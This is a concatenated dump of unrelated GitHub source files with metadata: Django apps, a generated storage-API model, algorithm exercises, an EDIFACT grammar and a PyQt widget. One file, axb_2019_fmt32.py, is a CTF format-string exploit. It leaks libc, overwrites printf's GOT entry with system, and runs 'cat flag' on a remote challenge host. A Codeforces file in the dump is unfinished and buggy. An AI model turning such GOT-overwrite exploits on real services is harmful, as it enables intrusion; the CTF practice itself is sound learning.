5bc99ce805369e20b7123860247511801e95408a | a08225934c425be313a12975c9563a72ded58be6 | /round644/spystring.py | ce55548d95836a56223f6329afb0e371f8c94c36 | [] | no_license | marcus-aurelianus/codeforce | 27c966554dee9986f23fb2925bd53e6cceb8b9e9 | 4764df151ade7806e32b6c88283a2de946f99e16 | refs/heads/master | 2023-03-18T09:30:55.042594 | 2021-03-12T18:14:08 | 2021-03-12T18:14:08 | 231,387,022 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,221 | py | import sys
reader = (s.rstrip() for s in sys.stdin)
input = reader.__next__
def gift():
for _ in range(t):
n,m = list(map(int,input().split()))
arrys=[]
for i in range(n):
kap=list(input())
arrys.append(kap)
diffdic={}
for i in range(n):
for j in range(m):
for k in range(i+1,n):
if arrys[i][j]!=arrys[k][j]:
kap=diffdic.get(j,[])
kap.append([i,k])
diffdic[j]=kap
if len(diffdic)>2:
yield -1
else:
ans=""
notin=[]
for j in range(m):
if j not in diffdic:
ans+=arrys[0][j]
else:
counterdic={}
for i in range(n):
ele=arrys[i][j]
freq=counterdic.get(ele,0)
counterdi[ele]=freq+1
maxele=max(counterdic, key=counterdic.get)
yield diffdic
#aaaab
#abaaa
#aabbb
if __name__ == '__main__':
t= int(input())
ans = gift()
print(*ans,sep='\n')
| [
"marcus.lihao@gmail.com"
] | marcus.lihao@gmail.com |
d111130febd4bb406c6961126dc1ccc74bee080c | 2523b2690fadfccbd56153de011b27faa9c31c61 | /urls.py | 8c77ab489dea24ded6afb1dcaa2ac4aea5f7be80 | [] | no_license | victorhook/django-init | 39cf66a33f7a4e10c86f09ade19934996402906a | e38692467ff2c8093e7803b359934ec182fe4681 | refs/heads/master | 2023-04-05T16:31:17.654905 | 2021-04-16T10:44:46 | 2021-04-16T10:44:46 | 358,564,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.urls import path, include
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
path('accounts/', include('django.contrib.auth.urls')),
path('', views.index, name='index')
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"victorkrook96@gmail.com"
] | victorkrook96@gmail.com |
8c2dbaf86f524f55059765161f070307296f1b6a | 4809471274d6e136ac66d1998de5acb185d1164e | /pypureclient/flasharray/FA_2_5/models/remote_protection_group_snapshot_transfer.py | 6739780776fb0f1bc143dee2bc29bf1b53da6baf | [
"BSD-2-Clause"
] | permissive | astrojuanlu/py-pure-client | 053fef697ad03b37ba7ae21a0bbb466abf978827 | 6fa605079950765c316eb21c3924e8329d5e3e8a | refs/heads/master | 2023-06-05T20:23:36.946023 | 2021-06-28T23:44:24 | 2021-06-28T23:44:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,411 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_5 import models
class RemoteProtectionGroupSnapshotTransfer(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'destroyed': 'bool',
'started': 'int',
'progress': 'float',
'completed': 'int',
'data_transferred': 'int',
'physical_bytes_written': 'int'
}
attribute_map = {
'name': 'name',
'destroyed': 'destroyed',
'started': 'started',
'progress': 'progress',
'completed': 'completed',
'data_transferred': 'data_transferred',
'physical_bytes_written': 'physical_bytes_written'
}
required_args = {
}
def __init__(
self,
name=None, # type: str
destroyed=None, # type: bool
started=None, # type: int
progress=None, # type: float
completed=None, # type: int
data_transferred=None, # type: int
physical_bytes_written=None, # type: int
):
"""
Keyword args:
name (str): A user-specified name. The name must be locally unique and can be changed.
destroyed (bool): Returns a value of `true` if the snapshot has been destroyed and is pending eradication. The destroyed snapshot can be recovered by setting `destroyed=false`. Once the eradication pending period has elapsed, the snapshot is permanently eradicated and can no longer be recovered.
started (int): The timestamp of when the snapshot replication process started. Measured in milliseconds since the UNIX epoch.
progress (float): The percentage progress of the snapshot transfer from the source array to the target. Displayed in decimal format.
completed (int): The timestamp of when the snapshot replication process completed. Measured in milliseconds since the UNIX epoch.
data_transferred (int): The number of bytes transferred from the source to the target as part of the replication process. Measured in bytes.
physical_bytes_written (int): The amount of physical/logical data written to the target due to replication. Measured in bytes.
"""
if name is not None:
self.name = name
if destroyed is not None:
self.destroyed = destroyed
if started is not None:
self.started = started
if progress is not None:
self.progress = progress
if completed is not None:
self.completed = completed
if data_transferred is not None:
self.data_transferred = data_transferred
if physical_bytes_written is not None:
self.physical_bytes_written = physical_bytes_written
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupSnapshotTransfer`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RemoteProtectionGroupSnapshotTransfer, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RemoteProtectionGroupSnapshotTransfer):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hubert.chan@purestorage.com"
] | hubert.chan@purestorage.com |
4486aa023f431fbbf7808e49ae5aa6d05d16892a | 8878700a71196cc33b7be00357b625cf9883043c | /store/models.py | f9f50d892d1ed47c590678476853e180d3cda592 | [
"MIT"
] | permissive | Jerome-Celle/Blitz-API | bc7db966cbbb45b29bbbe944adb954d6cb5a0040 | a0f870d6774abf302886ab70e169572a9d0225ef | refs/heads/master | 2021-06-10T06:05:03.753314 | 2018-11-30T15:40:38 | 2018-11-30T15:46:19 | 165,642,546 | 0 | 0 | MIT | 2019-01-14T10:32:29 | 2019-01-14T10:32:28 | null | UTF-8 | Python | false | false | 6,465 | py | import decimal
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation
)
from django.contrib.contenttypes.models import ContentType
from simple_history.models import HistoricalRecords
from blitz_api.models import AcademicLevel
User = get_user_model()
TAX = settings.LOCAL_SETTINGS['SELLING_TAX']
class Order(models.Model):
"""Represents a transaction."""
class Meta:
verbose_name = _("Order")
verbose_name_plural = _("Orders")
user = models.ForeignKey(
User,
on_delete=models.CASCADE,
verbose_name=_("User"),
related_name='orders',
)
transaction_date = models.DateTimeField(
verbose_name=_("Transaction date"),
)
authorization_id = models.CharField(
verbose_name=_("Authorization ID"),
max_length=253,
)
settlement_id = models.CharField(
verbose_name=_("Settlement ID"),
max_length=253,
)
history = HistoricalRecords()
@property
def total_cost(self):
cost = 0
orderlines = self.order_lines.filter(
models.Q(content_type__model='membership') |
models.Q(content_type__model='package')
)
for orderline in orderlines:
cost += orderline.content_object.price * orderline.quantity
return round(decimal.Decimal(float(cost) + TAX * float(cost)), 2)
@property
def total_ticket(self):
tickets = 0
orderlines = self.order_lines.filter(
content_type__model='timeslot'
)
for orderline in orderlines:
tickets += orderline.content_object.price * orderline.quantity
return tickets
def __str__(self):
return str(self.authorization_id)
class OrderLine(models.Model):
"""
Represents a line of an order. Can specify the product/service with a
generic relationship.
"""
class Meta:
verbose_name = _("Order line")
verbose_name_plural = _("Order lines")
content_type = models.ForeignKey(
ContentType,
on_delete=models.CASCADE
)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'content_type',
'object_id'
)
order = models.ForeignKey(
Order,
on_delete=models.CASCADE,
verbose_name=_("Order"),
related_name='order_lines',
)
quantity = models.PositiveIntegerField(
verbose_name=_("Quantity"),
)
history = HistoricalRecords()
def __str__(self):
return str(self.content_object) + ', qt:' + str(self.quantity)
class BaseProduct(models.Model):
"""Abstract model for base products"""
name = models.CharField(
verbose_name=_("Name"),
max_length=253,
)
available = models.BooleanField(
verbose_name=_("Available")
)
price = models.DecimalField(
max_digits=6,
decimal_places=2,
verbose_name=_("Price"),
)
details = models.CharField(
verbose_name=_("Details"),
max_length=1000,
null=True,
blank=True,
)
order_lines = GenericRelation(OrderLine)
class Meta:
abstract = True
class Membership(BaseProduct):
"""Represents a membership."""
class Meta:
verbose_name = _("Membership")
verbose_name_plural = _("Memberships")
duration = models.DurationField()
academic_levels = models.ManyToManyField(
AcademicLevel,
blank=True,
verbose_name=_("Academic levels"),
related_name='memberships',
)
# History is registered in translation.py
# history = HistoricalRecords()
def __str__(self):
return self.name
class Package(BaseProduct):
"""Represents a reservation package."""
class Meta:
verbose_name = _("Package")
verbose_name_plural = _("Packages")
reservations = models.PositiveIntegerField(
verbose_name=_("Reservations"),
)
exclusive_memberships = models.ManyToManyField(
Membership,
blank=True,
verbose_name=_("Memberships"),
related_name='packages',
)
# History is registered in translation.py
# history = HistoricalRecords()
def __str__(self):
return self.name
class CustomPayment(models.Model):
"""
Represents a custom payment that is not directly related to a product.
Used for manual custom transactions.
"""
user = models.ForeignKey(
User,
on_delete=models.CASCADE,
verbose_name=_("User"),
related_name='custom_payments',
)
name = models.CharField(
verbose_name=_("Name"),
max_length=253,
)
price = models.DecimalField(
max_digits=6,
decimal_places=2,
verbose_name=_("Price"),
)
details = models.TextField(
verbose_name=_("Details"),
max_length=1000,
null=True,
blank=True,
)
transaction_date = models.DateTimeField(
verbose_name=_("Transaction date"),
)
authorization_id = models.CharField(
verbose_name=_("Authorization ID"),
max_length=253,
)
settlement_id = models.CharField(
verbose_name=_("Settlement ID"),
max_length=253,
)
class Meta:
verbose_name = _("Custom payment")
verbose_name_plural = _("Custom payments")
history = HistoricalRecords()
def __str__(self):
return self.name
class PaymentProfile(models.Model):
"""Represents a payment profile linked to an external payment API."""
class Meta:
verbose_name = _("Payment profile")
verbose_name_plural = _("Payment profiles")
name = models.CharField(
verbose_name=_("Name"),
max_length=253,
)
owner = models.ForeignKey(
User,
on_delete=models.CASCADE,
verbose_name=_("User"),
related_name='payment_profiles',
)
external_api_id = models.CharField(
verbose_name=_("External profile ID"),
max_length=253,
)
external_api_url = models.CharField(
verbose_name=_("External profile url"),
max_length=253,
)
history = HistoricalRecords()
def __str__(self):
return self.name
| [
"frank.jeanneau@gmail.com"
] | frank.jeanneau@gmail.com |
0901d4428fc72e6ab7427fe2b0ad71f2f49f8bad | 9bcf722780efec7994bebe2bb476b0784b0a353a | /307-Range-Sum-Query---Mutable/solution.py | f7918453c713753e26ed2787028a1077c52ef1f3 | [] | no_license | wenjie1070116/Leetcode | a1429810513276b845bfb36284bd747308c015b3 | 5f5791b1e7eefa0205cbb6cb8ae2d5320ffcd916 | refs/heads/master | 2020-04-06T06:50:23.762233 | 2016-08-19T19:36:15 | 2016-08-19T19:36:15 | 58,875,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,149 | py | class SegmentTreeNode(object):
def __init__(self, start, end, Sum):
self.start, self.end, self.Sum = start, end, Sum
self.left = None
self.right = None
class NumArray(object):
def build(self, start, end, nums):
if start > end: return None
root = SegmentTreeNode(start, end, 0)
if start == end:
root.Sum = nums[start]
else:
mid = start + (end-start)/2
root.left = self.build(start, mid, nums)
root.right = self.build(mid+1, end, nums)
root.Sum = root.left.Sum + root.right.Sum
return root
def __init__(self, nums):
"""
initialize your data structure here.
:type nums: List[int]
"""
self.root = None
if nums:
self.root = self.build(0, len(nums)-1, nums)
def updateTree(self, root, i, val):
if not root or i < root.start or i > root.end: return
if root.start == root.end == i:
root.Sum = val
return
mid = root.start+(root.end-root.start)/2
if i > mid:
self.updateTree(root.right, i, val)
else:
self.updateTree(root.left, i, val)
root.Sum = root.left.Sum+root.right.Sum
def update(self, i, val):
"""
:type i: int
:type val: int
:rtype: int
"""
return self.updateTree(self.root, i, val)
def sumTree(self, root, i, j):
if not root or j < root.start or i > root.end: return 0
if i <= root.start and j >= root.end:
return root.Sum
left = self.sumTree(root.left, i, j)
right = self.sumTree(root.right, i, j)
return left+right
def sumRange(self, i, j):
"""
sum of elements nums[i..j], inclusive.
:type i: int
:type j: int
:rtype: int
"""
return self.sumTree(self.root, i, j)
# Your NumArray object will be instantiated and called as such:
# numArray = NumArray(nums)
# numArray.sumRange(0, 1)
# numArray.update(1, 10)
# numArray.sumRange(1, 2) | [
"wenjie1070116@gmail.com"
] | wenjie1070116@gmail.com |
cc8cd1ec82602764bdcdb0ffa52d5ca1d2deafeb | 7e40c8bb28c2cee8e023751557b90ef7ef518326 | /axb_2019_fmt32/axb_2019_fmt32.py | f6e5ec9ea1fe5058692348efeed119877bb83dff | [] | no_license | 1337536723/buuctf_pwn | b6e5d65372ed0638a722faef1775026a89321fa3 | cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf | refs/heads/master | 2023-08-29T19:35:04.352530 | 2021-11-16T14:06:20 | 2021-11-16T14:06:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | from pwn import *
context.log_level = 'debug'
pn = './axb_2019_fmt32'
#p = process(pn)
p = remote('node4.buuoj.cn', 26960)
elf = ELF(pn)
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('libc-2.23.so')
#gdb.attach(p, 'b *0x804874b')
printf_got = elf.got['printf']
read_got = elf.got['read']
#leak libc
payload = b'a' + p32(read_got) + b'%8$s'
p.sendlineafter('me:', payload)
p.recv(14)
libc_base = (u32(p.recv(4))) - libc.sym['read']
print('libc_base -> {}'.format(hex(libc_base)))
system = libc_base + libc.sym['system']
p.recvuntil(b'me:')
payload = b'a' + fmtstr_payload(8, { printf_got: system }, write_size = 'byte', numbwritten = 0x9 + 1)
p.sendline(payload)
p.sendlineafter(b'\n', b';cat flag')
p.interactive()
| [
"admin@srmxy.cn"
] | admin@srmxy.cn |
2c4749b55b8632ded80bdbe938e0155072f390c3 | fd453abf8b9b049894ddd7848be7bb5e6f1aa26d | /setup.py | 1cc18dcd8ddbadcb278eb4e7c624ac30f20b794e | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | luzfcb/django-weasyprint-pdf | b9d895f998c467114cfb0e8b7e8ada7ee469d286 | c03ccb8229f317b3492ea7a5e748d4c720a6dd23 | refs/heads/master | 2021-01-23T07:56:38.612731 | 2017-01-31T21:14:19 | 2017-01-31T21:44:26 | 80,524,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,589 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
import io
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import splitext
from setuptools import find_packages
from setuptools import setup
def read(*names, **kwargs):
return io.open(
join(dirname(__file__), *names),
encoding=kwargs.get('encoding', 'utf8')
).read()
setup(
name='django-weasyprint-pdf',
version='0.1.0',
license='BSD',
description='django helper tools to integrate with WeasyPrint',
long_description='%s\n%s' % (
re.compile('^.. start-badges.*^.. end-badges', re.M | re.S).sub('', read('README.rst')),
re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.rst'))
),
author='Fabio C. Barrionuevo da Luz',
author_email='bnafta@gmail.com',
url='https://github.com/luzfcb/django-weasyprint-pdf',
packages=find_packages('src'),
package_dir={'': 'src'},
py_modules=[splitext(basename(path))[0] for path in glob('src/*.py')],
include_package_data=True,
zip_safe=False,
classifiers=[
# complete classifier list: http://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: Unix',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
# uncomment if you test on these interpreters:
# 'Programming Language :: Python :: Implementation :: IronPython',
# 'Programming Language :: Python :: Implementation :: Jython',
# 'Programming Language :: Python :: Implementation :: Stackless',
'Topic :: Utilities',
],
keywords=[
# eg: 'keyword1', 'keyword2', 'keyword3',
],
install_requires=[
# eg: 'aspectlib==1.1.1', 'six>=1.7',
],
extras_require={
# eg:
# 'rst': ['docutils>=0.11'],
# ':python_version=="2.6"': ['argparse'],
},
)
| [
"bnafta@gmail.com"
] | bnafta@gmail.com |
e2ffe3b3f784c2225d4166221373e5d2d572aa63 | cb6d888dfe457cf4a80c5187da7f74be92453a3f | /HackerEarth/Complete the Syllabus.py | 16020d6070ba82ef2c3fd10d99c70f9faad61620 | [] | no_license | abhaykatheria/cp | 7e7b6ce971fdbb9207cb1cba237a3d4b47cff111 | 62cd3895798b64a4b8d307f94d419abe6e6b702f | refs/heads/master | 2021-05-22T15:23:47.512506 | 2020-10-29T09:17:50 | 2020-10-29T09:17:50 | 252,980,081 | 1 | 7 | null | 2020-10-29T09:17:52 | 2020-04-04T11:34:59 | Python | UTF-8 | Python | false | false | 586 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 8 16:16:09 2018
@author: Mithilesh
"""
def syllabus(k,arr):
arr2=["MONDAY","TUESDAY","WEDNESDAY","THURSDAY","FRIDAY","SATURDAY","SUNDAY"]
top=[]
sum1=0
for i in range(0,7):
sum1+=arr[i]
top.append(sum1)
for j in range(0,7):
if sum1<k:
k=k%sum1
if k==0:
k=sum1
if top[j]==k or (k<top[j]):
print(arr2[j])
break
t=int(input())
for q in range(t):
k=int(input())
arr=list(map(int,input().split()))
syllabus(k,arr) | [
"shubhamtiwari.tiwari84@gmail.com"
] | shubhamtiwari.tiwari84@gmail.com |
03b1c3aaa4b1a0ecf553a3969d8e37a6882cb547 | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D05A/SSRECHD05AUN.py | ad47858fe13c1e7b9f99a99290d03be45c4d3a2b | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,448 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD05AUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'GEI', MIN: 1, MAX: 1},
{ID: 'RFF', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'PNA', MIN: 1, MAX: 2, LEVEL: [
{ID: 'ADR', MIN: 0, MAX: 1},
{ID: 'GIR', MIN: 0, MAX: 1},
]},
{ID: 'IND', MIN: 1, MAX: 99, LEVEL: [
{ID: 'DTM', MIN: 1, MAX: 6},
{ID: 'COT', MIN: 1, MAX: 3},
{ID: 'EMP', MIN: 0, MAX: 1, LEVEL: [
{ID: 'PNA', MIN: 0, MAX: 1},
{ID: 'ADR', MIN: 0, MAX: 1},
]},
]},
{ID: 'UNS', MIN: 1, MAX: 1},
{ID: 'PNA', MIN: 1, MAX: 6, LEVEL: [
{ID: 'NAT', MIN: 0, MAX: 1},
{ID: 'DOC', MIN: 0, MAX: 1},
{ID: 'ADR', MIN: 0, MAX: 2},
{ID: 'ATT', MIN: 0, MAX: 5},
{ID: 'DTM', MIN: 0, MAX: 2, LEVEL: [
{ID: 'ADR', MIN: 0, MAX: 1},
]},
{ID: 'PDI', MIN: 0, MAX: 2, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 2},
]},
]},
{ID: 'COT', MIN: 0, MAX: 9, LEVEL: [
{ID: 'CNT', MIN: 1, MAX: 5},
]},
{ID: 'FTX', MIN: 0, MAX: 2},
{ID: 'AUT', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
80b7beb89f444ac0b71e10bbaa5697f4458824a9 | fd326562890d4f1987c384fc7c60374938231222 | /OOP/IteratorsAndGenerators/CountdownIterator.py | 154fdb5c0771576a8a4b29805b0a5cc2c3bfb0cf | [] | no_license | miro-lp/SoftUni | cc3b0ff742218c9ceaf93f05c319ccfeed5bc8a4 | 283d9328537919de49f7f6a301e58593bae9ca2a | refs/heads/main | 2023-08-23T21:22:07.856226 | 2021-08-25T15:10:18 | 2021-08-25T15:10:18 | 318,134,101 | 2 | 1 | null | 2021-08-10T12:51:54 | 2020-12-03T09:03:08 | Python | UTF-8 | Python | false | false | 368 | py | class countdown_iterator:
def __init__(self, count):
self.count = count
def __iter__(self):
return self
def __next__(self):
value = self.count
if self.count < 0:
raise StopIteration
self.count -= 1
return value
iterator = countdown_iterator(10)
for item in iterator:
print(item, end=" ")
| [
"miro_lp@abv.bg"
] | miro_lp@abv.bg |
bdc796bee4bc8a8d5e9c396427bde2e9c5892227 | f5fffd35eb8870150cfd9f700b398b25dfe3534e | /lingvo2/gui/video/video.py | 30b89711ebd96f728a5588cf3eed6f3c74df65db | [] | no_license | zaswed76/sling | a09e84e0bcc94e83f43d74b769298544627d271b | 22b945983eb94a5a29523ee54e8197fcc4c60a5c | refs/heads/master | 2022-09-20T07:11:25.242353 | 2020-05-25T11:53:01 | 2020-05-25T11:53:01 | 254,921,645 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | #!/usr/bin/env python3
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import *
from gui.video.player2 import VideoPlayer
from gui.custom.customwidgets import *
class Video(QFrame):
def __init__(self, main, objectName=None, config=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)
self.main = main
self.cfg = config
self.setObjectName(objectName)
self.player = VideoPlayer(self.cfg, "", self.main, None)
self.box = BoxLayout(QBoxLayout.TopToBottom, self)
self.box.addWidget(self.player)
def setFile(self, file):
self.player.setFile(file)
self.player.playButton.setEnabled(True)
def play(self):
self.player.play()
def pause(self):
self.player.mediaPlayer.pause()
def setSizeVideo(self, w, h):
qsizef = QSizeF(w, h)
self.player.videoItem.setSize(qsizef)
self.player.graphicsView.setFixedSize(w+2, h+2)
# self.player.graphicsView.setS
if __name__ == '__main__':
app = QApplication(sys.argv)
# app.setStyleSheet(open('./etc/{0}.qss'.format('style'), "r").read())
main = Video()
main.show()
sys.exit(app.exec_()) | [
"zaswed76@gmail.com"
] | zaswed76@gmail.com |
5390adbcfe0b2fb0e3b38ef37b9af7675659560b | 4f313d7a5a141584a0f28e93bb1e3c9bffa3daec | /9_7.py | a360953002fa7e711b1a58dcd5c9789f68f85e80 | [] | no_license | GKPython/A-Byte-of-Python | f19ea8f39589dc073d3e599fe14e8172dee87eb3 | a11587b158225363c6ae900da50652046b4ab90d | refs/heads/master | 2021-06-21T20:24:44.582310 | 2017-09-01T09:00:00 | 2017-09-01T09:00:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | # coding=utf-8
name = 'Swaroop'
if name.startswith('S'):
print 'name is started with "S"'
if 'oo' in name:
print 'name contains "oo"'
if name.find('ar') != -1:
print 'name contains "ar"'
delimiter = '_*_'
shoplist = ['apple', 'pear', 'carrot', 'banana']
print delimiter.join(shoplist) | [
"cbb903601682@163.com"
] | cbb903601682@163.com |
37323d7388b9fc2043edebc8b3ee17d9c40753a4 | ec4c8ec5ea3fc7db5a8552687a21ac554dc49d6f | /seatrekking/users/apps.py | dbc9db0c5f458230678d5d0d95f75027640198c6 | [
"MIT"
] | permissive | martin-martin/seatrekking | 57710c298665d771dea0337a470012b7ff82b237 | fc98fb43f50a070624539a93abcbd189726466fe | refs/heads/master | 2020-03-26T23:18:34.829490 | 2018-08-21T08:11:15 | 2018-08-21T08:11:15 | 145,529,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | from django.apps import AppConfig
class UsersAppConfig(AppConfig):
name = "seatrekking.users"
verbose_name = "Users"
def ready(self):
try:
import users.signals # noqa F401
except ImportError:
pass
| [
"breuss.martin@gmail.com"
] | breuss.martin@gmail.com |
c6d48c629d6d9d5f2bb99cb6a1d57f4ddd706ac0 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/Event/EventOverlay/EventOverlayJobTransforms/share/BS_Selector_jobOptions.py | cee37f5f9e62ba8c9e9e26053c3a0368e0f760ca | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,245 | py | include( "ByteStreamCnvSvc/BSEventStorageEventSelector_jobOptions.py" )
svcMgr = theApp.serviceMgr()
ByteStreamInputSvc = svcMgr.ByteStreamInputSvc
theApp.EvtMax = 20
theApp.SkipEvents = 0
MessageSvc.OutputLevel = INFO
ByteStreamInputSvc.FullFileName += ["/u/at/ahaas/nfs2/temp/minbias/data10_7TeV.00152845.physics_RNDM.merge.RAW/data10_7TeV.00152845.physics_RNDM.merge.RAW._lb0200._0001.1","/u/at/ahaas/nfs2/temp/minbias/data10_7TeV.00152845.physics_RNDM.merge.RAW/data10_7TeV.00152845.physics_RNDM.merge.RAW._lb0201._0001.1"]
#ByteStreamInputSvc.ValidateEvent=False
#ByteStreamInputSvc.DumpFlag = True
#ByteStreamInputSvc.SkipNeventBeforeNext=10
print ByteStreamInputSvc
from AthenaCommon.AlgSequence import AlgSequence
topSequence = AlgSequence()
# get the filter algortihm
from TrigT1ResultByteStream.TrigT1ResultByteStreamConf import CTPByteStreamTool,RecCTPByteStreamTool
if not hasattr( svcMgr, "ByteStreamAddressProviderSvc" ):
from ByteStreamCnvSvcBase.ByteStreamCnvSvcBaseConf import ByteStreamAddressProviderSvc
svcMgr += ByteStreamAddressProviderSvc()
svcMgr.ByteStreamAddressProviderSvc.TypeNames += [
"ROIB::RoIBResult/RoIBResult",
"MuCTPI_RDO/MUCTPI_RDO",
"CTP_RDO/CTP_RDO",
"MuCTPI_RIO/MUCTPI_RIO",
"CTP_RIO/CTP_RIO"
]
from OverlayCommonAlgs.OverlayCommonAlgsConf import BSFilter
filAlg=BSFilter("BSFilter")
filAlg.TriggerBit=63 # The trigger bit to select
topSequence+=filAlg
# BS OutputStream Tool
OutStreamName="OutputStreamBSCopy"
from ByteStreamCnvSvc.ByteStreamCnvSvcConf import ByteStreamEventStorageOutputSvc,ByteStreamOutputStreamCopyTool
bsCopyTool = ByteStreamOutputStreamCopyTool("OutputStreamBSCopyTool")
svcMgr.ToolSvc += bsCopyTool
# Service to write out BS events
bsOutputSvc=ByteStreamEventStorageOutputSvc("BSESOutputSvc0",OutputDirectory="temp/",SimpleFileName="SelectedBSEvents")
svcMgr += bsOutputSvc
bsCopyTool.ByteStreamOutputSvc=bsOutputSvc
bsCopyTool.ByteStreamInputSvc=svcMgr.ByteStreamInputSvc
# create AthenaOutputStream for BS Copy
from AthenaServices.AthenaServicesConf import AthenaOutputStream
OutputStreamBSCopy = AthenaOutputStream( OutStreamName, WritingTool=bsCopyTool )
topSequence += OutputStreamBSCopy
OutputStreamBSCopy.AcceptAlgs =["BSFilter"]
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
5178891a024ece70b7e141b46dcf6e10125719ca | ee721fac058d6c0472be24f95e3cc8df37f4198d | /Stack/letter.py | 886078dbf96d36aae384663781528a0a8f35af6d | [] | no_license | Horlawhumy-dev/Python_DataStructures | 51af03dcbed86a51009c13657b17584f09d0a40d | c5aad1fe6c6566414c76711a0871abf9529fe04f | refs/heads/master | 2023-06-04T09:32:34.776313 | 2021-07-02T21:43:09 | 2021-07-02T21:43:09 | 377,631,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 611 | py | # Letter Frequency
import math
# You are making a program to analyze text.
# Take the text as the first input and a letter as the second input, and output the frequency of that letter in the text as a whole percentage.
# Sample Input:
# hello
# l
# Sample Output:
# 40
# The letter l appears 2 times in the text hello, which has 5 letters. So, the frequency would be (2/5)*100 = 40
#your code goes here
text = input("Enter your sample text: ")
letter = input("Enter the letter to be counted: ")
if letter in text:
result = text.count(letter) / len(text) * 100
print(str(math.floor(result)) + '%') | [
"harof.dev@gmail.com"
] | harof.dev@gmail.com |
